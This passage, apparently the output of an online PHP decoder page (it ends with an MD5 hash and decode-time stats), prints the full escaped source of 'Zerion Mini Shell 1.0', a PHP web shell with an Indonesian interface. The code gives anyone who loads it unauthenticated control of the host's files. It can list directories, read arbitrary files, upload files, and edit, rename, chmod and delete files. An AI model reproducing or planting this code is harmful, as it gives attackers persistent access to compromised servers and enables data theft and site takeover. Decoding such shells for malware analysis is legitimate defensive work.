5px;\n-webkit-border-radius:5px;\nborder-radius:5px;\n}\n</style>\n</HEAD>\n<BODY>\n<H1><center><img src="https://s.yimg.com/lq/i/mesg/emoticons7/19.gif"/>\n Mini Shell <img src="https://s.yimg.com/lq/i/mesg/emoticons7/19.gif"/>\n </center></H1>\n<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">\n<tr><td>Direktori : \'; if(isset(\\$_GET[\'path\'])){ \\$path = \\$_GET[\'path\']; }else{ \\$path = getcwd(); } \\$path = str_replace(\'\\\\\',\'/\',\\$path); \\$paths = explode(\'/\',\\$path); foreach(\\$paths as \\$id=>\\$pat){ if(\\$pat == \'\' && \\$id == 0){ \\$a = true; echo \'<a href="?path=/">/</a>\'; continue; } if(\\$pat == \'\') continue; echo \'<a href="?path=\'; for(\\$i=0;\\$i<=\\$id;\\$i++){ echo "\\$paths[\\$i]"; if(\\$i != \\$id) echo "/"; } echo \'">\'.\\$pat.\'</a>/\'; } echo \'</td></tr><tr><td>\';if(isset(\\$_POST[\'path_create\'])) {if(@mkdir(\\$path.\'/\' . \\$_POST[\'path_create\'])){echo \'<font color="green">create success :* \'.\\$path.\'/\' . \\$_POST[\'path_create\'].\'</font><br />\';}else{echo \'<font color="red">create failed :* \'.\\$path.\'/\' . \\$_POST[\'path_create\'].\'</font><br />\';}}if(isset(\\$_FILES[\'file\'])){ if(copy(\\$_FILES[\'file\'][\'tmp_name\'],\\$path.\'/\'.\\$_FILES[\'file\'][\'name\'])){ echo \'<font color="green">File Ter-Upload :* </font><br />\'; }else{ echo \'<font color="red">Upload gagal, Servernya kek <img src="http://c.fastcompany.net/asset_files/-/2014/11/11/4F4.gif"/>\n </font><br />\'; } } echo \'<form enctype="multipart/form-data" method="POST">\nUpload File : <input type="file" name="file" />\n<input type="submit" value="upload" />\n</form>\n</td></tr>\n<tr><td><form enctype="multipart/form-data" method="POST">\nCreate Path : <input type="text" name="path_create" />\n<input type="submit" value="create" />\n</form></td></td>\'; if(isset(\\$_GET[\'filesrc\'])){ echo "<tr><td>Current File : "; echo \\$_GET[\'filesrc\']; echo \'</tr></td></table><br />\'; echo(\'<pre>\'.htmlspecialchars(file_get_contents(\\$_GET[\'filesrc\'])).\'</pre>\'); }elseif(isset(\\$_GET[\'option\']) && \\$_POST[\'opt\'] != \'delete\'){ echo \'</table><br /><center>\'.\\$_POST[\'path\'].\'<br /><br />\'; if(\\$_POST[\'opt\'] == \'chmod\'){ if(isset(\\$_POST[\'perm\'])){ if(chmod(\\$_POST[\'path\'],octdec(\\$_POST[\'perm\']))){ echo \'<font color="green">Change Permission Done.</font><br />\'; }else{ echo \'<font color="red">Change Permission Error.</font><br />\'; } } echo \'<form method="POST">\nPermission : <input name="perm" type="text" size="4" value="\'.substr(sprintf(\'%o\', fileperms(\\$_POST[\'path\'])), -4).\'" />\n<input type="hidden" name="path" value="\'.\\$_POST[\'path\'].\'">\n<input type="hidden" name="opt" value="chmod">\n<input type="submit" value="Go" />\n</form>\'; }elseif(\\$_POST[\'opt\'] == \'rename\'){ if(isset(\\$_POST[\'newname\'])){ if(rename(\\$_POST[\'path\'],\\$path.\'/\'.\\$_POST[\'newname\'])){ echo \'<font color="green">Change Name Done.</font><br />\'; }else{ echo \'<font color="red">Change Name Error.</font><br />\'; } \\$_POST[\'name\'] = \\$_POST[\'newname\']; } echo \'<form method="POST">\nNew Name : <input name="newname" type="text" size="20" value="\'.\\$_POST[\'name\'].\'" />\n<input type="hidden" name="path" value="\'.\\$_POST[\'path\'].\'">\n<input type="hidden" name="opt" value="rename">\n<input type="submit" value="Go" />\n</form>\'; }elseif(\\$_POST[\'opt\'] == \'edit\'){ if(isset(\\$_POST[\'src\'])){ \\$fp = fopen(\\$_POST[\'path\'],\'w\'); if(fwrite(\\$fp,\\$_POST[\'src\'])){ echo \'<font color="green">Edit File Done ~_^.</font><br />\'; }else{ echo \'<font color="red">Edit File Error ~_~.</font><br />\'; } fclose(\\$fp); } echo \'<form method="POST">\n<textarea cols=80 rows=20 name="src">\'.htmlspecialchars(file_get_contents(\\$_POST[\'path\'])).\'</textarea><br />\n<input type="hidden" name="path" value="\'.\\$_POST[\'path\'].\'">\n<input type="hidden" name="opt" value="edit">\n<input type="submit" value="Go" />\n</form>\'; } echo \'</center>\'; }else{ echo \'</table><br /><center>\'; if(isset(\\$_GET[\'option\']) && \\$_POST[\'opt\'] == \'delete\'){ if(\\$_POST[\'type\'] == \'dir\'){ if(rmdir(\\$_POST[\'path\'])){ echo \'<font color="green">Delete Dir Done.</font><br />\'; }else{ echo \'<font color="red">Delete Dir Error.</font><br />\'; } }elseif(\\$_POST[\'type\'] == \'file\'){ if(unlink(\\$_POST[\'path\'])){ echo \'<font color="green">Delete File Done.</font><br />\'; }else{ echo \'<font color="red">Delete File Error.</font><br />\'; } } } echo \'</center>\'; \\$scandir = scandir(\\$path); echo \'<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">\n<tr class="first">\n<td><center>Name</center></td>\n<td><center>Size</center></td>\n<td><center>Permissions</center></td>\n<td><center>Options</center></td>\n</tr>\'; foreach(\\$scandir as \\$dir){ if(!is_dir("\\$path/\\$dir") || \\$dir == \'.\' || \\$dir == \'..\') continue; echo "<tr>\n<td><a href=\\"?path=\\$path/\\$dir\\">\\$dir</a></td>\n<td><center>--</center></td>\n<td><center>"; if(is_writable("\\$path/\\$dir")) echo \'<font color="green">\'; elseif(!is_readable("\\$path/\\$dir")) echo \'<font color="red">\'; echo perms("\\$path/\\$dir"); if(is_writable("\\$path/\\$dir") || !is_readable("\\$path/\\$dir")) echo \'</font>\'; echo "</center></td>\n<td><center><form method=\\"POST\\" action=\\"?option&path=\\$path\\">\n<select name=\\"opt\\">\n<option value=\\"\\"></option>\n<option value=\\"delete\\">Delete</option>\n<option value=\\"chmod\\">Chmod</option>\n<option value=\\"rename\\">Rename</option>\n</select>\n<input type=\\"hidden\\" name=\\"type\\" value=\\"dir\\">\n<input type=\\"hidden\\" name=\\"name\\" value=\\"\\$dir\\">\n<input type=\\"hidden\\" name=\\"path\\" value=\\"\\$path/\\$dir\\">\n<input type=\\"submit\\" value=\\">\\" />\n</form></center></td>\n</tr>"; } echo \'<tr class="first"><td></td><td></td><td></td><td></td></tr>\'; foreach(\\$scandir as \\$file){ if(!is_file("\\$path/\\$file")) continue; \\$size = filesize("\\$path/\\$file")/1024; \\$size = round(\\$size,3); if(\\$size >= 1024){ \\$size = round(\\$size/1024,2).\' MB\'; }else{ \\$size = \\$size.\' KB\'; } echo "<tr>\n<td><a href=\\"?filesrc=\\$path/\\$file&path=\\$path\\">\\$file</a></td>\n<td><center>".\\$size."</center></td>\n<td><center>"; if(is_writable("\\$path/\\$file")) echo \'<font color="green">\'; elseif(!is_readable("\\$path/\\$file")) echo \'<font color="red">\'; echo perms("\\$path/\\$file"); if(is_writable("\\$path/\\$file") || !is_readable("\\$path/\\$file")) echo \'</font>\'; echo "</center></td>\n<td><center><form method=\\"POST\\" action=\\"?option&path=\\$path\\">\n<select name=\\"opt\\">\n<option value=\\"\\"></option>\n<option value=\\"delete\\">Delete</option>\n<option value=\\"chmod\\">Chmod</option>\n<option value=\\"rename\\">Rename</option>\n<option value=\\"edit\\">Edit</option>\n</select>\n\n<input type=\\"hidden\\" name=\\"type\\" value=\\"file\\">\n<input type=\\"hidden\\" name=\\"name\\" value=\\"\\$file\\">\n<input type=\\"hidden\\" name=\\"path\\" value=\\"\\$path/\\$file\\">\n<input type=\\"submit\\" value=\\">\\" />\n</form></center></td>\n</tr>"; } echo \'</table>\n</div>\'; } echo \'<center><br />Zerion Mini Shell <font color="green">1.0</font></center>\n</BODY>\n</HTML>\'; function perms(\\$file){ \\$perms = fileperms(\\$file); if ((\\$perms & 0xC000) == 0xC000) { \\$info = \'s\'; } elseif ((\\$perms & 0xA000) == 0xA000) { \\$info = \'l\'; } elseif ((\\$perms & 0x8000) == 0x8000) { \\$info = \'-\'; } elseif ((\\$perms & 0x6000) == 0x6000) { \\$info = \'b\'; } elseif ((\\$perms & 0x4000) == 0x4000) { \\$info = \'d\'; } elseif ((\\$perms & 0x2000) == 0x2000) { \\$info = \'c\'; } elseif ((\\$perms & 0x1000) == 0x1000) { \\$info = \'p\'; } else { \\$info = \'u\'; } \\$info .= ((\\$perms & 0x0100) ? \'r\' : \'-\'); \\$info .= ((\\$perms & 0x0080) ? \'w\' : \'-\'); \\$info .= ((\\$perms & 0x0040) ? ((\\$perms & 0x0800) ? \'s\' : \'x\' ) : ((\\$perms & 0x0800) ? \'S\' : \'-\')); \\$info .= ((\\$perms & 0x0020) ? \'r\' : \'-\'); \\$info .= ((\\$perms & 0x0010) ? \'w\' : \'-\'); \\$info .= ((\\$perms & 0x0008) ? ((\\$perms & 0x0400) ? \'s\' : \'x\' ) : ((\\$perms & 0x0400) ? \'S\' : \'-\')); \\$info .= ((\\$perms & 0x0004) ? \'r\' : \'-\'); \\$info .= ((\\$perms & 0x0002) ? \'w\' : \'-\'); \\$info .= ((\\$perms & 0x0001) ? ((\\$perms & 0x0200) ? \'t\' : \'x\' ) : ((\\$perms & 0x0200) ? \'T\' : \'-\')); return \\$info; }'}]

Stats

MD5 cb524227132a8d24fcc7e2ce5a02c87f
Eval Count 0
Decode Time 39 ms